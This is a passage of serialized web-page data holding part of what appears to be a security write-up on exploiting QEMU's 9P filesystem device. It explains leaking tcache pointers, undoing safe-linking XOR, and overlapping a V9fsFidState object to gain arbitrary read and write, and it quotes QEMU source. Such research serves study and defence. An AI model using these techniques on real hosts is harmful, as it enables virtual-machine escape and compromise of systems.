achieved earlier:",{"type":24,"tag":291,"props":136007,"children":136009},{"code":136008}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| |\nv v\n+--------------------+--------------------+\n| | |\n| .value Y | .value C |\n| | |\n+--------------------+--------------------+\n",[136010],{"type":24,"tag":145,"props":136011,"children":136012},{"__ignoreMap":7},[136013],{"type":30,"value":136008},{"type":24,"tag":32,"props":136015,"children":136016},{},[136017,136019,136025,136027,136033,136035,136041,136043,136048],{"type":30,"value":136018},"We first free ",{"type":24,"tag":145,"props":136020,"children":136022},{"className":136021},[],[136023],{"type":30,"value":136024},".value C",{"type":30,"value":136026}," into tcache and read its contents through the oversized ",{"type":24,"tag":145,"props":136028,"children":136030},{"className":136029},[],[136031],{"type":30,"value":136032},".value Y",{"type":30,"value":136034},". This gives us ",{"type":24,"tag":145,"props":136036,"children":136038},{"className":136037},[],[136039],{"type":30,"value":136040},".value C >> 12",{"type":30,"value":136042},". That is not yet the exact address of ",{"type":24,"tag":145,"props":136044,"children":136046},{"className":136045},[],[136047],{"type":30,"value":136024},{"type":30,"value":136049},", since the lower 12 bits are lost.",{"type":24,"tag":32,"props":136051,"children":136052},{},[136053,136055,136060,136062,136067,136069,136074,136076,136081],{"type":30,"value":136054},"To recover the exact address of a controlled heap chunk, we reclaim ",{"type":24,"tag":145,"props":136056,"children":136058},{"className":136057},[],[136059],{"type":30,"value":136024},{"type":30,"value":136061},", then free a different controlled chunk into the same tcache bin. After that, we free ",{"type":24,"tag":145,"props":136063,"children":136065},{"className":136064},[],[136066],{"type":30,"value":136024},{"type":30,"value":136068}," again. This time, ",{"type":24,"tag":145,"props":136070,"children":136072},{"className":136071},[],[136073],{"type":30,"value":64283},{"type":30,"value":136075}," is no longer ",{"type":24,"tag":145,"props":136077,"children":136079},{"className":136078},[],[136080],{"type":30,"value":8855},{"type":30,"value":136082},", but instead points to that controlled chunk, so the encoded forward pointer becomes:",{"type":24,"tag":291,"props":136084,"children":136085},{"code":135957},[136086],{"type":24,"tag":145,"props":136087,"children":136088},{"__ignoreMap":7},[136089],{"type":30,"value":135957},{"type":24,"tag":32,"props":136091,"children":136092},{},[136093,136095,136101,136103,136108,136110,136115,136117,136122],{"type":30,"value":136094},"Since we already know ",{"type":24,"tag":145,"props":136096,"children":136098},{"className":136097},[],[136099],{"type":30,"value":136100},"curr >> 12",{"type":30,"value":136102}," from the first leak, we can read the new ",{"type":24,"tag":145,"props":136104,"children":136106},{"className":136105},[],[136107],{"type":30,"value":135952},{"type":30,"value":136109}," value from ",{"type":24,"tag":145,"props":136111,"children":136113},{"className":136112},[],[136114],{"type":30,"value":136024},{"type":30,"value":136116}," and recover the exact address of ",{"type":24,"tag":145,"props":136118,"children":136120},{"className":136119},[],[136121],{"type":30,"value":64283},{"type":30,"value":136123}," by reversing the XOR:",{"type":24,"tag":291,"props":136125,"children":136127},{"code":136126},"next = fd ^ (curr >> 12)\n",[136128],{"type":24,"tag":145,"props":136129,"children":136130},{"__ignoreMap":7},[136131],{"type":30,"value":136126},{"type":24,"tag":32,"props":136133,"children":136134},{},[136135],{"type":30,"value":136136},"This gives us the exact address of a heap chunk whose contents we control.",{"type":24,"tag":80,"props":136138,"children":136140},{"id":136139},"arbitrary-read-and-write",[136141],{"type":30,"value":136142},"Arbitrary Read and Write",{"type":24,"tag":32,"props":136144,"children":136145},{},[136146,136148,136153],{"type":30,"value":136147},"Having a controlled chunk at a known address lets us repurpose ",{"type":24,"tag":145,"props":136149,"children":136151},{"className":136150},[],[136152],{"type":30,"value":136024},{"type":30,"value":136154}," into an arbitrary read/write primitive. To do that, we go back to the 9P device.",{"type":24,"tag":32,"props":136156,"children":136157},{},[136158,136160,136165],{"type":30,"value":136159},"Recall ",{"type":24,"tag":145,"props":136161,"children":136163},{"className":136162},[],[136164],{"type":30,"value":134629},{"type":30,"value":1679},{"type":24,"tag":291,"props":136167,"children":136169},{"code":136168,"language":294,"meta":7,"className":295,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n uint64_t size;\n V9fsFidState *file_fidp;\n V9fsFidState *xattr_fidp;\n\n [...]\n\n file_fidp = get_fid(pdu, fid);\n\n [...]\n\n /* Make the file fid point to xattr */\n xattr_fidp = file_fidp;\n xattr_fidp->fs.xattr.len = size;\n xattr_fidp->fs.xattr.value = g_malloc0(size);\n\n [...]\n",[136170],{"type":24,"tag":145,"props":136171,"children":136172},{"__ignoreMap":7},[136173,136212,136219,136230,136245,136260,136267,136274,136281,136303,136310,136317,136324,136332,136349,136388,136431,136438],{"type":24,"tag":301,"props":136174,"children":136175},{"class":303,"line":304},[136176,136180,136184,136188,136192,136196,136200,136204,136208],{"type":24,"tag":301,"props":136177,"children":136178},{"style":348},[136179],{"type":30,"value":752},{"type":24,"tag":301,"props":136181,"children":136182},{"style":348},[136183],{"type":30,"value":757},{"type":24,"tag":301,"props":136185,"children":136186},{"style":359},[136187],{"type":30,"value":134624},{"type":24,"tag":301,"props":136189,"children":136190},{"style":314},[136191],{"type":30,"value":134629},{"type":24,"tag":301,"props":136193,"children":136194},{"style":359},[136195],{"type":30,"value":362},{"type":24,"tag":301,"props":136197,"children":136198},{"style":348},[136199],{"type":30,"value":58352},{"type":24,"tag":301,"props":136201,"children":136202},{"style":385},[136203],{"type":30,"value":431},{"type":24,"tag":301,"props":136205,"children":136206},{"style":369},[136207],{"type":30,"value":134646},{"type":24,"tag":301,"props":136209,"children":136210},{"style":359},[136211],{"type":30,"value":791},{"type":24,"tag":301,"props":136213,"children":136214},{"class":303,"line":320},[136215],{"type":24,"tag":301,"props":136216,"children":136217},{"style":359},[136218],{"type":30,"value":799},{"type":24,"tag":301,"props":136220,"children":136221},{"class":303,"line":335},[136222,136226],{"type":24,"tag":301,"props":136223,"children":136224},{"style":348},[136225],{"type":30,"value":62335},{"type":24,"tag":301,"props":136227,"children":136228},{"style":359},[136229],{"type":30,"value":3098},{"type":24,"tag":301,"props":136231,"children":136232},{"class":303,"line":344},[136233,136237,136241],{"type":24,"tag":301,"props":136234,"children":136235},{"style":359},[136236],{"type":30,"value":134771},{"type":24,"tag":301,"props":136238,"children":136239},{"style":385},[136240],{"type":30,"value":772},{"type":24,"tag":301,"props":136242,"children":136243},{"style":359},[136244],{"type":30,"value":134780},{"type":24,"tag":301,"props":136246,"children":136247},{"class":303,"line":401},[136248,136252,136256],{"type":24,"tag":301,"props":136249,"children":136250},{"style":359},[136251],{"type":30,"value":134771},{"type":24,"tag":301,"props":136253,"children":136254},{"style":385},[136255],{"type":30,"value":772},{"type":24,"tag":301,"props":136257,"children":136258},{"style":359},[136259],{"type":30,"value":134796},{"type":24,"tag":301,"props":136261,"children":136262},{"class":303,"line":415},[136263],{"type":24,"tag":301,"props":136264,"children":136265},{"emptyLinePlaceholder":16},[136266],{"type":30,"value":341},{"type":24,"tag":301,"props":136268,"children":136269},{"class":303,"line":439},[136270],{"type":24,"tag":301,"props":136271,"children":136272},{"style":359},[136273],{"type":30,"value":111495},{"type":24,"tag":301,"props":136275,"children":136276},{"class":303,"line":447},[136277],{"type":24,"tag":301,"props":136278,"children":136279},{"emptyLinePlaceholder":16},[136280],{"type":30,"value":341},{"type":24,"tag":301,"props":136282,"children":136283},{"class":303,"line":476},[136284,136289,136293,136298],{"type":24,"tag":301,"props":136285,"children":136286},{"style":359},[136287],{"type":30,"value":136288}," file_fidp ",{"type":24,"tag":301,"props":136290,"children":136291},{"style":385},[136292],{"type":30,"value":523},{"type":24,"tag":301,"props":136294,"children":136295},{"style":314},[136296],{"type":30,"value":136297}," get_fid",{"type":24,"tag":301,"props":136299,"children":136300},{"style":359},[136301],{"type":30,"value":136302},"(pdu, fid);\n",{"type":24,"tag":301,"props":136304,"children":136305},{"class":303,"line":495},[136306],{"type":24,"tag":301,"props":136307,"children":136308},{"emptyLinePlaceholder":16},[136309],{"type":30,"value":341},{"type":24,"tag":301,"props":136311,"children":136312},{"class":303,"line":504},[136313],{"type":24,"tag":301,"props":136314,"children":136315},{"style":359},[136316],{"type":30,"value":111495},{"type":24,"tag":301,"props":136318,"children":136319},{"class":303,"line":512},[136320],{"type":24,"tag":301,"props":136321,"children":136322},{"emptyLinePlaceholder":16},[136323],{"type":30,"value":341},{"type":24,"tag":301,"props":136325,"children":136326},{"class":303,"line":592},[136327],{"type":24,"tag":301,"props":136328,"children":136329},{"style":1062},[136330],{"type":30,"value":136331}," /* Make the file fid point to xattr */\n",{"type":24,"tag":301,"props":136333,"children":136334},{"class":303,"line":619},[136335,136340,136344],{"type":24,"tag":301,"props":136336,"children":136337},{"style":359},[136338],{"type":30,"value":136339}," xattr_fidp ",{"type":24,"tag":301,"props":136341,"children":136342},{"style":385},[136343],{"type":30,"value":523},{"type":24,"tag":301,"props":136345,"children":136346},{"style":359},[136347],{"type":30,"value":136348}," file_fidp;\n",{"type":24,"tag":301,"props":136350,"children":136351},{"class":303,"line":635},[136352,136356,136360,136364,136368,136372,136376,136380,136384],{"type":24,"tag":301,"props":136353,"children":136354},{"style":369},[136355],{"type":30,"value":135174},{"type":24,"tag":301,"props":136357,"children":136358},{"style":359},[136359],{"type":30,"value":882},{"type":24,"tag":301,"props":136361,"children":136362},{"style":369},[136363],{"type":30,"value":43724},{"type":24,"tag":301,"props":136365,"children":136366},{"style":359},[136367],{"type":30,"value":206},{"type":24,"tag":301,"props":136369,"children":136370},{"style":369},[136371],{"type":30,"value":135098},{"type":24,"tag":301,"props":136373,"children":136374},{"style":359},[136375],{"type":30,"value":206},{"type":24,"tag":301,"props":136377,"children":136378},{"style":369},[136379],{"type":30,"value":6156},{"type":24,"tag":301,"props":136381,"children":136382},{"style":385},[136383],{"type":30,"value":2537},{"type":24,"tag":301,"props":136385,"children":136386},{"style":359},[136387],{"type":30,"value":3098},{"type":24,"tag":301,"props":136389,"children":136390},{"class":303,"line":643},[136391,136395,136399,136403,136407,136411,136415,136419,136423,136427],{"type":24,"tag":301,"props":136392,"children":136393},{"style":369},[136394],{"type":30,"value":135174},{"type":24,"tag":301,"props":136396,"children":136397},{"style":359},[136398],{"type":30,"value":882},{"type":24,"tag":301,"props":136400,"children":136401},{"style":369},[136402],{"type":30,"value":43724},{"type":24,"tag":301,"props":136404,"children":136405},{"style":359},[136406],{"type":30,"value":206},{"type":24,"tag":301,"props":136408,"children":136409},{"style":369},[136410],{"type":30,"value":135098},{"type":24,"tag":301,"props":136412,"children":136413},{"style":359},[136414],{"type":30,"value":206},{"type":24,"tag":301,"props":136416,"children":136417},{"style":369},[136418],{"type":30,"value":5958},{"type":24,"tag":301,"props":136420,"children":136421},{"style":385},[136422],{"type":30,"value":2537},{"type":24,"tag":301,"props":136424,"children":136425},{"style":314},[136426],{"type":30,"value":130862},{"type":24,"tag":301,"props":136428,"children":136429},{"style":359},[136430],{"type":30,"value":135211},{"type":24,"tag":301,"props":136432,"children":136433},{"class":303,"line":652},[136434],{"type":24,"tag":301,"props":136435,"children":136436},{"emptyLinePlaceholder":16},[136437],{"type":30,"value":341},{"type":24,"tag":301,"props":136439,"children":136440},{"class":303,"line":666},[136441],{"type":24,"tag":301,"props":136442,"children":136443},{"style":359},[136444],{"type":30,"value":111495},{"type":24,"tag":32,"props":136446,"children":136447},{},[136448,136450,136456,136458,136463,136464,136469,136471,136476,136478,136484,136485,136491,136493,136498,136499,136504],{"type":30,"value":136449},"The important detail here is that an xattr FID stores both the backing pointer and its length inside the surrounding ",{"type":24,"tag":145,"props":136451,"children":136453},{"className":136452},[],[136454],{"type":30,"value":136455},"V9fsFidState",{"type":30,"value":136457}," object. In other words, if we can place a ",{"type":24,"tag":145,"props":136459,"children":136461},{"className":136460},[],[136462],{"type":30,"value":136455},{"type":30,"value":14138},{"type":24,"tag":145,"props":136465,"children":136467},{"className":136466},[],[136468],{"type":30,"value":136024},{"type":30,"value":136470}," currently sits, the overlapping ",{"type":24,"tag":145,"props":136472,"children":136474},{"className":136473},[],[136475],{"type":30,"value":136032},{"type":30,"value":136477}," chunk can overwrite ",{"type":24,"tag":145,"props":136479,"children":136481},{"className":136480},[],[136482],{"type":30,"value":136483},"V9fsFidState.fs.xattr.value",{"type":30,"value":2378},{"type":24,"tag":145,"props":136486,"children":136488},{"className":136487},[],[136489],{"type":30,"value":136490},"V9fsFidState.fs.xattr.len",{"type":30,"value":136492},". That would immediately give us arbitrary read and write through ",{"type":24,"tag":145,"props":136494,"children":136496},{"className":136495},[],[136497],{"type":30,"value":135287},{"type":30,"value":2378},{"type":24,"tag":145,"props":136500,"children":136502},{"className":136501},[],[136503],{"type":30,"value":135279},{"type":30,"value":206},{"type":24,"tag":32,"props":136506,"children":136507},{},[136508,136509,136514,136515,136520,136522,136527,136529,136535,136537,136542,136544,136549,136551,136556,136558,136563,136565,136570],{"type":30,"value":7323},{"type":24,"tag":145,"props":136510,"children":136512},{"className":136511},[],[136513],{"type":30,"value":136024},{"type":30,"value":7035},{"type":24,"tag":145,"props":136516,"children":136518},{"className":136517},[],[136519],{"type":30,"value":5071},{"type":30,"value":136521}," chunk, while ",{"type":24,"tag":145,"props":136523,"children":136525},{"className":136524},[],[136526],{"type":30,"value":136455},{"type":30,"value":136528}," falls into the ",{"type":24,"tag":145,"props":136530,"children":136532},{"className":136531},[],[136533],{"type":30,"value":136534},"0x120",{"type":30,"value":136536}," size class. Before freeing ",{"type":24,"tag":145,"props":136538,"children":136540},{"className":136539},[],[136541],{"type":30,"value":136024},{"type":30,"value":136543},", we therefore use the oversized ",{"type":24,"tag":145,"props":136545,"children":136547},{"className":136546},[],[136548],{"type":30,"value":136032},{"type":30,"value":136550}," chunk to change its size to match ",{"type":24,"tag":145,"props":136552,"children":136554},{"className":136553},[],[136555],{"type":30,"value":136455},{"type":30,"value":136557},". Once ",{"type":24,"tag":145,"props":136559,"children":136561},{"className":136560},[],[136562],{"type":30,"value":136024},{"type":30,"value":136564}," is freed, it is inserted into the ",{"type":24,"tag":145,"props":136566,"children":136568},{"className":136567},[],[136569],{"type":30,"value":136534},{"type":30,"value":136571}," tcache bin.",{"type":24,"tag":291,"props":136573,"children":136575},{"code":136574}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| Free |\nv 0x120 v\n+--------------------+---------------+----+\n| |...............| |\n| .value Y |...............| |\n| |...............| |\n+--------------------+---------------+----+\n",[136576],{"type":24,"tag":145,"props":136577,"children":136578},{"__ignoreMap":7},[136579],{"type":30,"value":136574},{"type":24,"tag":32,"props":136581,"children":136582},{},[136583,136585,136590,136592,136598,136600,136606,136608,136613],{"type":30,"value":136584},"After that, we can simply allocate a new ",{"type":24,"tag":145,"props":136586,"children":136588},{"className":136587},[],[136589],{"type":30,"value":136455},{"type":30,"value":136591}," with a ",{"type":24,"tag":145,"props":136593,"children":136595},{"className":136594},[],[136596],{"type":30,"value":136597},"P9_TWALK",{"type":30,"value":136599}," request and a fresh FID - this reaches ",{"type":24,"tag":145,"props":136601,"children":136603},{"className":136602},[],[136604],{"type":30,"value":136605},"alloc_fid",{"type":30,"value":136607},", which allocates a new ",{"type":24,"tag":145,"props":136609,"children":136611},{"className":136610},[],[136612],{"type":30,"value":136455},{"type":30,"value":1679},{"type":24,"tag":291,"props":136615,"children":136617},{"code":136616,"language":294,"meta":7,"className":295,"style":7},"static void coroutine_fn v9fs_walk(void *opaque)\n{\n V9fsFidState *fidp;\n V9fsFidState *newfidp = NULL;\n\n [...]\n\n if (fid == newfid) {\n [...]\n } else {\n newfidp = alloc_fid(s, newfid);\n if (newfidp == NULL) {\n err = -EINVAL;\n goto out;\n }\n newfidp->uid = fidp->uid;\n v9fs_path_copy(&newfidp->path, &path);\n }\n\n [...]\n}\n\nstatic V9fsFidState *alloc_fid(V9fsState *s, int32_t fid)\n{\n V9fsFidState *f;\n\n f = g_hash_table_lookup(s->fids, GINT_TO_POINTER(fid));\n if (f) {\n /* If fid is already there return NULL */\n BUG_ON(f->clunked);\n return NULL;\n }\n f = g_new0(V9fsFidState, 1);\n\n [...]\n",[136618],{"type":24,"tag":145,"props":136619,"children":136620},{"__ignoreMap":7},[136621,136661,136668,136684,136712,136719,136726,136733,136754,136761,136776,136798,136822,136843,136854,136861,136899,136941,136948,136955,136962,136969,136976,137027,137034,137049,137056,137104,137116,137124,137153,137168,137175,137204,137211],{"type":24,"tag":301,"props":136622,"children":136623},{"class":303,"line":304},[136624,136628,136632,136636,136641,136645,136649,136653,136657],{"type":24,"tag":301,"props":136625,"children":136626},{"style":348},[136627],{"type":30,"value":752},{"type":24,"tag":301,"props":136629,"children":136630},{"style":348},[136631],{"type":30,"value":757},{"type":24,"tag":301,"props":136633,"children":136634},{"style":359},[136635],{"type":30,"value":134624},{"type":24,"tag":301,"props":136637,"children":136638},{"style":314},[136639],{"type":30,"value":136640},"v9fs_walk",{"type":24,"tag":301,"props":136642,"children":136643},{"style":359},[136644],{"type":30,"value":362},{"type":24,"tag":301,"props":136646,"children":136647},{"style":348},[136648],{"type":30,"value":58352},{"type":24,"tag":301,"props":136650,"children":136651},{"style":385},[136652],{"type":30,"value":431},{"type":24,"tag":301,"props":136654,"children":136655},{"style":369},[136656],{"type":30,"value":134646},{"type":24,"tag":301,"props":136658,"children":136659},{"style":359},[136660],{"type":30,"value":791},{"type":24,"tag":301,"props":136662,"children":136663},{"class":303,"line":320},[136664],{"type":24,"tag":301,"props":136665,"children":136666},{"style":359},[136667],{"type":30,"value":799},{"type":24,"tag":301,"props":136669,"children":136670},{"class":303,"line":335},[136671,136675,136679],{"type":24,"tag":301,"props":136672,"children":136673},{"style":359},[136674],{"type":30,"value":134771},{"type":24,"tag":301,"props":136676,"children":136677},{"style":385},[136678],{"type":30,"value":772},{"type":24,"tag":301,"props":136680,"children":136681},{"style":359},[136682],{"type":30,"value":136683},"fidp;\n",{"type":24,"tag":301,"props":136685,"children":136686},{"class":303,"line":344},[136687,136691,136695,136700,136704,136708],{"type":24,"tag":301,"props":136688,"children":136689},{"style":359},[136690],{"type":30,"value":134771},{"type":24,"tag":301,"props":136692,"children":136693},{"style":385},[136694],{"type":30,"value":772},{"type":24,"tag":301,"props":136696,"children":136697},{"style":359},[136698],{"type":30,"value":136699},"newfidp ",{"type":24,"tag":301,"props":136701,"children":136702},{"style":385},[136703],{"type":30,"value":523},{"type":24,"tag":301,"props":136705,"children":136706},{"style":348},[136707],{"type":30,"value":612},{"type":24,"tag":301,"props":136709,"children":136710},{"style":359},[136711],{"type":30,"value":492},{"type":24,"tag":301,"props":136713,"children":136714},{"class":303,"line":401},[136715],{"type":24,"tag":301,"props":136716,"children":136717},{"emptyLinePlaceholder":16},[136718],{"type":30,"value":341},{"type":24,"tag":301,"props":136720,"children":136721},{"class":303,"line":415},[136722],{"type":24,"tag":301,"props":136723,"children":136724},{"style":359},[136725],{"type":30,"value":111495},{"type":24,"tag":301,"props":136727,"children":136728},{"class":303,"line":439},[136729],{"type":24,"tag":301,"props":136730,"children":136731},{"emptyLinePlaceholder":16},[136732],{"type":30,"value":341},{"type":24,"tag":301,"props":136734,"children":136735},{"class":303,"line":447},[136736,136740,136745,136749],{"type":24,"tag":301,"props":136737,"children":136738},{"style":308},[136739],{"type":30,"value":453},{"type":24,"tag":301,"props":136741,"children":136742},{"style":359},[136743],{"type":30,"value":136744}," (fid ",{"type":24,"tag":301,"props":136746,"children":136747},{"style":385},[136748],{"type":30,"value":607},{"type":24,"tag":301,"props":136750,"children":136751},{"style":359},[136752],{"type":30,"value":136753}," newfid) {\n",{"type":24,"tag":301,"props":136755,"children":136756},{"class":303,"line":476},[136757],{"type":24,"tag":301,"props":136758,"children":136759},{"style":359},[136760],{"type":30,"value":5858},{"type":24,"tag":301,"props":136762,"children":136763},{"class":303,"line":495},[136764,136768,136772],{"type":24,"tag":301,"props":136765,"children":136766},{"style":359},[136767],{"type":30,"value":22565},{"type":24,"tag":301,"props":136769,"children":136770},{"style":308},[136771],{"type":30,"value":10144},{"type":24,"tag":301,"props":136773,"children":136774},{"style":359},[136775],{"type":30,"value":3035},{"type":24,"tag":301,"props":136777,"children":136778},{"class":303,"line":504},[136779,136784,136788,136793],{"type":24,"tag":301,"props":136780,"children":136781},{"style":359},[136782],{"type":30,"value":136783}," newfidp ",{"type":24,"tag":301,"props":136785,"children":136786},{"style":385},[136787],{"type":30,"value":523},{"type":24,"tag":301,"props":136789,"children":136790},{"style":314},[136791],{"type":30,"value":136792}," alloc_fid",{"type":24,"tag":301,"props":136794,"children":136795},{"style":359},[136796],{"type":30,"value":136797},"(s, newfid);\n",{"type":24,"tag":301,"props":136799,"children":136800},{"class":303,"line":512},[136801,136805,136810,136814,136818],{"type":24,"tag":301,"props":136802,"children":136803},{"style":308},[136804],{"type":30,"value":3285},{"type":24,"tag":301,"props":136806,"children":136807},{"style":359},[136808],{"type":30,"value":136809}," (newfidp ",{"type":24,"tag":301,"props":136811,"children":136812},{"style":385},[136813],{"type":30,"value":607},{"type":24,"tag":301,"props":136815,"children":136816},{"style":348},[136817],{"type":30,"value":612},{"type":24,"tag":301,"props":136819,"children":136820},{"style":359},[136821],{"type":30,"value":398},{"type":24,"tag":301,"props":136823,"children":136824},{"class":303,"line":592},[136825,136830,136834,136838],{"type":24,"tag":301,"props":136826,"children":136827},{"style":359},[136828],{"type":30,"value":136829}," err ",{"type":24,"tag":301,"props":136831,"children":136832},{"style":385},[136833],{"type":30,"value":523},{"type":24,"tag":301,"props":136835,"children":136836},{"style":385},[136837],{"type":30,"value":3407},{"type":24,"tag":301,"props":136839,"children":136840},{"style":359},[136841],{"type":30,"value":136842},"EINVAL;\n",{"type":24,"tag":301,"props":136844,"children":136845},{"class":303,"line":619},[136846,136850],{"type":24,"tag":301,"props":136847,"children":136848},{"style":308},[136849],{"type":30,"value":67264},{"type":24,"tag":301,"props":136851,"children":136852},{"style":359},[136853],{"type":30,"value":67269},{"type":24,"tag":301,"props":136855,"children":136856},{"class":303,"line":635},[136857],{"type":24,"tag":301,"props":136858,"children":136859},{"style":359},[136860],{"type":30,"value":3345},{"type":24,"tag":301,"props":136862,"children":136863},{"class":303,"line":643},[136864,136869,136873,136878,136882,136887,136891,136895],{"type":24,"tag":301,"props":136865,"children":136866},{"style":369},[136867],{"type":30,"value":136868}," newfidp",{"type":24,"tag":301,"props":136870,"children":136871},{"style":359},[136872],{"type":30,"value":882},{"type":24,"tag":301,"props":136874,"children":136875},{"style":369},[136876],{"type":30,"value":136877},"uid",{"type":24,"tag":301,"props":136879,"children":136880},{"style":385},[136881],{"type":30,"value":2537},{"type":24,"tag":301,"props":136883,"children":136884},{"style":369},[136885],{"type":30,"value":136886}," fidp",{"type":24,"tag":301,"props":136888,"children":136889},{"style":359},[136890],{"type":30,"value":882},{"type":24,"tag":301,"props":136892,"children":136893},{"style":369},[136894],{"type":30,"value":136877},{"type":24,"tag":301,"props":136896,"children":136897},{"style":359},[136898],{"type":30,"value":492},{"type":24,"tag":301,"props":136900,"children":136901},{"class":303,"line":652},[136902,136907,136911,136915,136920,136924,136928,136932,136936],{"type":24,"tag":301,"props":136903,"children":136904},{"style":314},[136905],{"type":30,"value":136906}," v9fs_path_copy",{"type":24,"tag":301,"props":136908,"children":136909},{"style":359},[136910],{"type":30,"value":362},{"type":24,"tag":301,"props":136912,"children":136913},{"style":385},[136914],{"type":30,"value":556},{"type":24,"tag":301,"props":136916,"children":136917},{"style":369},[136918],{"type":30,"value":136919},"newfidp",{"type":24,"tag":301,"props":136921,"children":136922},{"style":359},[136923],{"type":30,"value":882},{"type":24,"tag":301,"props":136925,"children":136926},{"style":369},[136927],{"type":30,"value":119017},{"type":24,"tag":301,"props":136929,"children":136930},{"style":359},[136931],{"type":30,"value":377},{"type":24,"tag":301,"props":136933,"children":136934},{"style":385},[136935],{"type":30,"value":556},{"type":24,"tag":301,"props":136937,"children":136938},{"style":359},[136939],{"type":30,"value":136940},"path);\n",{"type":24,"tag":301,"props":136942,"children":136943},{"class":303,"line":666},[136944],{"type":24,"tag":301,"props":136945,"children":136946},{"style":359},[136947],{"type":30,"value":501},{"type":24,"tag":301,"props":136949,"children":136950},{"class":303,"line":674},[136951],{"type":24,"tag":301,"props":136952,"children":136953},{"emptyLinePlaceholder":16},[136954],{"type":30,"value":341},{"type":24,"tag":301,"props":136956,"children":136957},{"class":303,"line":692},[136958],{"type":24,"tag":301,"props":136959,"children":136960},{"style":359},[136961],{"type":30,"value":111495},{"type":24,"tag":301,"props":136963,"children":136964},{"class":303,"line":3631},[136965],{"type":24,"tag":301,"props":136966,"children":136967},{"style":359},[136968],{"type":30,"value":698},{"type":24,"tag":301,"props":136970,"children":136971},{"class":303,"line":3639},[136972],{"type":24,"tag":301,"props":136973,"children":136974},{"emptyLinePlaceholder":16},[136975],{"type":30,"value":341},{"type":24,"tag":301,"props":136977,"children":136978},{"class":303,"line":3647},[136979,136983,136988,136992,136996,137001,137005,137009,137013,137018,137023],{"type":24,"tag":301,"props":136980,"children":136981},{"style":348},[136982],{"type":30,"value":752},{"type":24,"tag":301,"props":136984,"children":136985},{"style":359},[136986],{"type":30,"value":136987}," V9fsFidState ",{"type":24,"tag":301,"props":136989,"children":136990},{"style":385},[136991],{"type":30,"value":772},{"type":24,"tag":301,"props":136993,"children":136994},{"style":314},[136995],{"type":30,"value":136605},{"type":24,"tag":301,"props":136997,"children":136998},{"style":359},[136999],{"type":30,"value":137000},"(V9fsState ",{"type":24,"tag":301,"props":137002,"children":137003},{"style":385},[137004],{"type":30,"value":772},{"type":24,"tag":301,"props":137006,"children":137007},{"style":369},[137008],{"type":30,"value":1724},{"type":24,"tag":301,"props":137010,"children":137011},{"style":359},[137012],{"type":30,"value":377},{"type":24,"tag":301,"props":137014,"children":137015},{"style":348},[137016],{"type":30,"value":137017},"int32_t",{"type":24,"tag":301,"props":137019,"children":137020},{"style":369},[137021],{"type":30,"value":137022}," fid",{"type":24,"tag":301,"props":137024,"children":137025},{"style":359},[137026],{"type":30,"value":791},{"type":24,"tag":301,"props":137028,"children":137029},{"class":303,"line":3685},[137030],{"type":24,"tag":301,"props":137031,"children":137032},{"style":359},[137033],{"type":30,"value":799},{"type":24,"tag":301,"props":137035,"children":137036},{"class":303,"line":3713},[137037,137041,137045],{"type":24,"tag":301,"props":137038,"children":137039},{"style":359},[137040],{"type":30,"value":134771},{"type":24,"tag":301,"props":137042,"children":137043},{"style":385},[137044],{"type":30,"value":772},{"type":24,"tag":301,"props":137046,"children":137047},{"style":359},[137048],{"type":30,"value":57893},{"type":24,"tag":301,"props":137050,"children":137051},{"class":303,"line":3721},[137052],{"type":24,"tag":301,"props":137053,"children":137054},{"emptyLinePlaceholder":16},[137055],{"type":30,"value":341},{"type":24,"tag":301,"props":137057,"children":137058},{"class":303,"line":3751},[137059,137064,137068,137073,137077,137081,137085,137090,137094,137099],{"type":24,"tag":301,"props":137060,"children":137061},{"style":359},[137062],{"type":30,"value":137063}," f ",{"type":24,"tag":301,"props":137065,"children":137066},{"style":385},[137067],{"type":30,"value":523},{"type":24,"tag":301,"props":137069,"children":137070},{"style":314},[137071],{"type":30,"value":137072}," g_hash_table_lookup",{"type":24,"tag":301,"props":137074,"children":137075},{"style":359},[137076],{"type":30,"value":362},{"type":24,"tag":301,"props":137078,"children":137079},{"style":369},[137080],{"type":30,"value":1724},{"type":24,"tag":301,"props":137082,"children":137083},{"style":359},[137084],{"type":30,"value":882},{"type":24,"tag":301,"props":137086,"children":137087},{"style":369},[137088],{"type":30,"value":137089},"fids",{"type":24,"tag":301,"props":137091,"children":137092},{"style":359},[137093],{"type":30,"value":377},{"type":24,"tag":301,"props":137095,"children":137096},{"style":314},[137097],{"type":30,"value":137098},"GINT_TO_POINTER",{"type":24,"tag":301,"props":137100,"children":137101},{"style":359},[137102],{"type":30,"value":137103},"(fid));\n",{"type":24,"tag":301,"props":137105,"children":137106},{"class":303,"line":3782},[137107,137111],{"type":24,"tag":301,"props":137108,"children":137109},{"style":308},[137110],{"type":30,"value":453},{"type":24,"tag":301,"props":137112,"children":137113},{"style":359},[137114],{"type":30,"value":137115}," (f) {\n",{"type":24,"tag":301,"props":137117,"children":137118},{"class":303,"line":3791},[137119],{"type":24,"tag":301,"props":137120,"children":137121},{"style":1062},[137122],{"type":30,"value":137123}," /* If fid is already there return NULL */\n",{"type":24,"tag":301,"props":137125,"children":137126},{"class":303,"line":3819},[137127,137132,137136,137140,137144,137149],{"type":24,"tag":301,"props":137128,"children":137129},{"style":314},[137130],{"type":30,"value":137131}," BUG_ON",{"type":24,"tag":301,"props":137133,"children":137134},{"style":359},[137135],{"type":30,"value":362},{"type":24,"tag":301,"props":137137,"children":137138},{"style":369},[137139],{"type":30,"value":39835},{"type":24,"tag":301,"props":137141,"children":137142},{"style":359},[137143],{"type":30,"value":882},{"type":24,"tag":301,"props":137145,"children":137146},{"style":369},[137147],{"type":30,"value":137148},"clunked",{"type":24,"tag":301,"props":137150,"children":137151},{"style":359},[137152],{"type":30,"value":589},{"type":24,"tag":301,"props":137154,"children":137155},{"class":303,"line":4397},[137156,137160,137164],{"type":24,"tag":301,"props":137157,"children":137158},{"style":308},[137159],{"type":30,"value":482},{"type":24,"tag":301,"props":137161,"children":137162},{"style":348},[137163],{"type":30,"value":612},{"type":24,"tag":301,"props":137165,"children":137166},{"style":359},[137167],{"type":30,"value":492},{"type":24,"tag":301,"props":137169,"children":137170},{"class":303,"line":4405},[137171],{"type":24,"tag":301,"props":137172,"children":137173},{"style":359},[137174],{"type":30,"value":501},{"type":24,"tag":301,"props":137176,"children":137177},{"class":303,"line":4422},[137178,137182,137186,137191,137196,137200],{"type":24,"tag":301,"props":137179,"children":137180},{"style":359},[137181],{"type":30,"value":137063},{"type":24,"tag":301,"props":137183,"children":137184},{"style":385},[137185],{"type":30,"value":523},{"type":24,"tag":301,"p